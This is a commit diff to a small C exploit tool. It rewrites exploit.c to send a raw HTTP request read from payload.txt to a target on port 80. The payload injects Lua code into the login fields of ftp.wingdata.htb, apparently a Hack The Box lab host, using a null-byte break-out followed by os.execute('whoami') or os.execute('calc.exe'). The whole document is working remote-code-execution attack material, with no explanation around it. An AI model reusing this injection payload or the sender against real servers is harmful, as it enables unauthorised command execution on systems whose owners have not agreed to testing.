upate

Makefile

@@ -1,7 +1,7 @@
 EXEC = exploit
 
 $(EXEC): exploit.o
-	gcc -o $(EXEC) exploit.o
+	gcc -g -o $(EXEC) exploit.o
 
 exploit.o: exploit.c
-	gcc -c exploit.c
+	gcc -g -c exploit.c

exploit.c

@@ -21,29 +21,33 @@ int main(int argc, char** argv){
   dest_addr.sin_port = htons(80);
   dest_addr.sin_addr.s_addr = inet_addr(argv[1]);
 
-
   int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr));
   printf("ret_connect = %d\n", ret);
 
   char buffer[100];
   memset(buffer, 0, 100);
+  
+  FILE* fichier_out = fopen("payload.txt", "r");
+  fseek(fichier_out, 0, SEEK_END);
 
-  strncpy(buffer, "GET /login.html HTTP/1.1\r\n", 100);
+  
-  send(fd, buffer, strlen(buffer), 0);
+  int size = fichier_out->_offset;
-
+  char*	file_buffer = malloc(size);
-  strncpy(buffer, "Host: ftp.wingdata.htb\r\n", 100);
+  fseek(fichier_out, 0, SEEK_SET);
-  send(fd, buffer, strlen(buffer), 0);
+  fread(file_buffer, 1, size, fichier_out);
-
+  for (int i = 0; i < size; i++){
-  strncpy(buffer, "Accept: */*\r\n", 100);
+	  char	c = file_buffer[i];
-  send(fd, buffer, strlen(buffer), 0);
+	  if (c == '\n')
-
+		  send(fd, "\r\n", 2, 0);
-  strncpy(buffer, "\r\n", 100);
+	  else
-  send(fd, buffer, strlen(buffer), 0);
+		  send(fd, &c, 1, 0);
-
+  }
+  send(fd, "\r\n", 2, 0);
   int n;
   while (( n = recv(fd, buffer, 99, 0)) > 0){
 	  buffer[n] = 0;
 	  printf("%s", buffer);
   }
+  fclose(fichier_out);
   return 0;
 }

payload.txt

@@ -12,5 +12,4 @@ Referer: http://ftp.wingdata.htb/login.html
 Accept-Encoding: gzip, deflate, br
 Cookie: client_lang=french
 Connection: keep-alive
-
+username=anonymous&password=anonymous%2500%5D%5D+os.execute%28%27whoami%27%29+--&username_val=anonymous&password_val=anonymous%2500%5D%5D+os.execute%28%27calc.exe%27%29+--
-username=anonymous&password=anonymous%2500%5D%5D+os.execute%28%27calc.exe%27%29+--&username_val=anonymous&password_val=anonymous%2500%5D%5D+os.execute%28%27calc.exe%27%29+--